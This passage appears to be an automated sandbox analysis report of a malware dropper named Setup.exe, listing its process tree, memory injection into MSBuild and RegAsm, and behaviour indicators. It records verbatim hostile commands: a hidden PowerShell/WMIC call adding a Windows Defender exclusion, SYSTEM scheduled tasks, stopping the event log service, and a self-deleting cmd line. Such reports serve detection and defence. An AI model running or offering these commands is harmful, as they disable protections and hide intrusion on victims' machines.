pid Process 1184 Setup.exe 1784 Setup.exe 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 3164 yhHzUVDC2pAw9goJepU_qORY.exe 564 5XopSKg9PUSZohSIWN2v9xOT.exe 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 3724 1vI2dSu9Otp3tPl9bmA85PJf.exe 2848 cJGyky9EhCckJumZf6fkM6G5.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 200 Klk_ndJuZUINtD72UfY7IaBv.tmp 4468 RegAsm.exe 1032 Install.exe 3656 MSBuild.exe 1252 Install.exe 2124 MSBuild.exe 2636 goldenmusicalvariety32_64.exe 772 RegAsm.exe 5104 Install.exe 1492 Install.exe 1524 goldenmusicalvariety32_64.exe 3736 BitLockerToGo.exe 2060 cmd.exe 4824 67f535e337.exe 4824 67f535e337.exe 2212 b9fcde3053.exe 1744 firefox.exe 5756 BFCFBFBFBK.exe 5864 RegAsm.exe 6004 KFIJJJEBGC.exe 6040 RegAsm.exe 5032 firefox.exe 4044 Setup.exe 2672 Setup.exe 6036 av_cOAXWNrelQa039CGbm0A1.exe 4912 IRrr6YljmO8hEIxi45BS9F3G.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 2364 sxM96ISlNbOtGCb6tmhTPqMM.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 6048 7NybowgkTtFNZ6zV5tAShfiu.exe 1784 av_cOAXWNrelQa039CGbm0A1.tmp 1496 MSBuild.exe 2236 MSBuild.exe 3020 RegAsm.exe 2956 RegAsm.exe 1612 BitLockerToGo.exe 940 Setup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1184 wrote to memory of 1916 1184 Setup.exe 88 PID 1184 wrote to memory of 1916 1184 Setup.exe 88 PID 1184 wrote to memory of 1916 1184 Setup.exe 88 PID 1184 wrote to memory of 4528 1184 Setup.exe 89 PID 1184 wrote to memory of 4528 1184 Setup.exe 89 PID 1184 wrote to memory of 4528 1184 Setup.exe 89 PID 1184 wrote to memory of 3724 1184 Setup.exe 90 PID 1184 wrote to memory of 3724 1184 Setup.exe 90 PID 1184 wrote to memory of 3724 1184 Setup.exe 90 PID 1184 wrote to memory of 2972 1184 Setup.exe 92 PID 1184 wrote to memory of 2972 1184 Setup.exe 92 PID 1184 wrote to memory of 2972 1184 Setup.exe 92 PID 1184 wrote to memory of 1096 1184 Setup.exe 95 PID 1184 wrote to memory of 1096 1184 Setup.exe 95 PID 1184 wrote to memory of 564 1184 Setup.exe 93 PID 1184 wrote to memory of 564 1184 Setup.exe 93 PID 1184 wrote to memory of 564 1184 Setup.exe 93 PID 1184 wrote to memory of 3164 1184 Setup.exe 91 PID 1184 wrote to memory of 3164 1184 Setup.exe 91 PID 1184 wrote to memory of 3164 1184 Setup.exe 91 PID 1184 wrote to memory of 3980 1184 Setup.exe 94 PID 1184 wrote to memory of 3980 1184 Setup.exe 94 PID 1184 wrote to memory of 2848 1184 Setup.exe 98 PID 1184 wrote to memory of 2848 1184 Setup.exe 98 PID 1184 wrote to memory of 2848 1184 Setup.exe 98 PID 1184 wrote to memory of 2324 1184 Setup.exe 96 PID 1184 wrote to memory of 2324 1184 Setup.exe 96 PID 1184 wrote to memory of 2324 1184 Setup.exe 96 PID 1184 wrote to memory of 4992 1184 Setup.exe 97 PID 1184 wrote to memory of 4992 1184 Setup.exe 97 PID 1184 wrote to memory of 4992 1184 Setup.exe 97 PID 2972 wrote to memory of 200 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 99 PID 2972 wrote to memory of 200 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 99 PID 2972 wrote to memory of 200 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 99 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 4992 wrote to memory of 1032 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 101 PID 4992 wrote to memory of 1032 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 101 PID 4992 wrote to memory of 1032 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 101 PID 1916 wrote to memory of 240 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 103 PID 1916 wrote to memory of 240 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 103 PID 1916 wrote to memory of 240 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 103 PID 3164 wrote to memory of 1252 3164 yhHzUVDC2pAw9goJepU_qORY.exe 102 PID 3164 wrote to memory of 1252 3164 yhHzUVDC2pAw9goJepU_qORY.exe 102 PID 3164 wrote to memory of 1252 3164 yhHzUVDC2pAw9goJepU_qORY.exe 102 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 1916 wrote to memory of 1852 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 105 PID 1916 wrote to memory of 1852 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 105 PID 1916 wrote to memory of 1852 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 105 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 1916 wrote to memory of 3592 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\archive.zip1⤵PID:2640
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3580
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\Documents\SimpleAdobe\cFb2c7uKqYcOaECU8XsTAIef.exeC:\Users\Admin\Documents\SimpleAdobe\cFb2c7uKqYcOaECU8XsTAIef.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3592
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2124 -
C:\ProgramData\BFCFBFBFBK.exe"C:\ProgramData\BFCFBFBFBK.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5756 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:5824
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5864
-
-
-
C:\ProgramData\KFIJJJEBGC.exe"C:\ProgramData\KFIJJJEBGC.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of SetWindowsHookEx
PID:6040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FHIDAKFIJJKJ" & exit4⤵PID:3912
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:3600
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\QwpLixYOI92BLmCZFEhE6Mbs.exeC:\Users\Admin\Documents\SimpleAdobe\QwpLixYOI92BLmCZFEhE6Mbs.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"3⤵PID:3076
-
C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\1000006001\67f535e337.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\67f535e337.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\1000011001\b9fcde3053.exe"C:\Users\Admin\AppData\Local\Temp\1000011001\b9fcde3053.exe"6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2212 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account7⤵PID:4480
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1744 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1464 -prefMapHandle 1476 -prefsLen 25751 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48ad2d88-7ccf-416d-bddb-5c705a201fe8} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" gpu9⤵PID:4288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 26671 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2295a223-894b-4451-ab2b-f5dd216ec283} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" socket9⤵PID:2080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 3256 -prefMapHandle 3252 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e20f165-eac5-4cf4-a691-87ca10f227cd} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:1452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -childID 2 -isForBrowser -prefsHandle 4104 -prefMapHandle 4092 -prefsLen 31161 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2577d75e-42c8-4294-bcbb-59c22cee37af} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:5080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4656 -prefMapHandle 4832 -prefsLen 31161 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74613018-6594-425f-8b1a-b94e0ccc0b9f} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" utility9⤵
- Checks processor information in registry
PID:5320
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6550c75-03fd-4f92-bc14-2d585aeab22d} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:4448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b9f3ae5-fe4f-4e0f-b547-04573c1eb0d0} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:4784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5812 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e789692e-dab1-46a0-95dc-2a2a63144e19} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:464
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EGHCBKKKFH.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:2060
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\1vI2dSu9Otp3tPl9bmA85PJf.exeC:\Users\Admin\Documents\SimpleAdobe\1vI2dSu9Otp3tPl9bmA85PJf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3724
-
-
C:\Users\Admin\Documents\SimpleAdobe\yhHzUVDC2pAw9goJepU_qORY.exeC:\Users\Admin\Documents\SimpleAdobe\yhHzUVDC2pAw9goJepU_qORY.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\Admin\AppData\Local\Temp\7zSB1D8.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe.\Install.exe /wdcUdidEsSsd "385132" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5104 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:4740
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:2384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:236 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beIeSqxTUIgkrqSZzo" /SC once /ST 23:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe\" tg /udfdidUwig 385132 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 8285⤵
- Program crash
PID:2364
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exeC:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\is-RORIG.tmp\Klk_ndJuZUINtD72UfY7IaBv.tmp"C:\Users\Admin\AppData\Local\Temp\is-RORIG.tmp\Klk_ndJuZUINtD72UfY7IaBv.tmp" /SL5="$B003E,5207631,54272,C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:200 -
C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe"C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -i4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2636
-
-
C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe"C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -s4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1524
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\5XopSKg9PUSZohSIWN2v9xOT.exeC:\Users\Admin\Documents\SimpleAdobe\5XopSKg9PUSZohSIWN2v9xOT.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:772
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\KAIgHVGHtDFBzfjGkrU7kU8s.exeC:\Users\Admin\Documents\SimpleAdobe\KAIgHVGHtDFBzfjGkrU7kU8s.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3980 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:1816
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:2384
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:2112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "CIFUBVHI"3⤵
- Launches sc.exe
PID:4288
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"3⤵
- Launches sc.exe
PID:4880
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3416
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "CIFUBVHI"3⤵
- Launches sc.exe
PID:3996
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\dz_LhQg5VnMy0wlI_6dK0bLe.exeC:\Users\Admin\Documents\SimpleAdobe\dz_LhQg5VnMy0wlI_6dK0bLe.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1096 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵
- Suspicious use of SetWindowsHookEx
PID:3736
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\vmr4hdyC4X94dgX9Bh3X3e0n.exeC:\Users\Admin\Documents\SimpleAdobe\vmr4hdyC4X94dgX9Bh3X3e0n.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3656 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKECFCFBGDHI" & exit4⤵PID:5000
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:1984
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\6AzFaABBWzIB3fzN1U16jtOf.exeC:\Users\Admin\Documents\SimpleAdobe\6AzFaABBWzIB3fzN1U16jtOf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Users\Admin\AppData\Local\Temp\7zSB1C8.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1032 -
C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe.\Install.exe /iVYHKdidh "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1492 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2232
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:4820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 23:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe\" Ij /spoadidY 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 7965⤵
- Program crash
PID:2284
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\cJGyky9EhCckJumZf6fkM6G5.exeC:\Users\Admin\Documents\SimpleAdobe\cJGyky9EhCckJumZf6fkM6G5.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4468
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4880
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1784
-
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exeC:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1472 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:3672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:4404
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:3348
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:708
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3056
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe Ij /spoadidY 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5180 -
